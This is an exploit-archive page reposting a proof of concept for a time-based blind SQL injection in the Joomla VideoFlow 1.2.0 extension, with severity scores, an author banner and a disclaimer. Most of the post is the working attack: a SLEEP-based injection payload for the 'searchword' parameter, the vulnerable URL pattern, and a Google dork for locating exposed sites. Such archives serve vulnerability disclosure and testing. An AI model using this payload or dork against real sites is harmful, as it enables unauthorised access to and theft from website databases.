Advertisement






Joomla VideoFlow 1.2.0 - SQL Injection

CVE Category Price Severity
N/A CWE-89 N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2017-05-25
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 0.812 0.968

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017050174

Below is a copy:

Joomla VideoFlow 1.2.0 - SQL Injection# Exploit Title: Joomla VideoFlow 1.2.0 - SQL Injection
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (Mojtaba Kazemi)
# Vendor Home : https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/videoflow/
# My Home : http://persian-team.ir/
# Google Dork : inurl:index.php?option=com_videoflow searchword
# Telegram Channel: @PersianHackTeam
# Tested on: Linux
# Date: 2017-05-23
 
# POC :
# SQL Injection : 

Parameter: searchword (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: option=com_videoflow&task=search&vs=1&searchword=Tutorialaa') AND (SELECT * FROM (SELECT(SLEEP(5)))DBYE) AND ('bEOv'='bEOv&layout=listview&Itemid=2

http://server/index.php?option=com_videoflow&task=search&vs=1&searchword=[SQL]&layout=listview&Itemid=2

# Greetz : T3NZOG4N & FireKernel
# Iranian White Hat Hackers
# Chera Zang Nemizanid D:


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum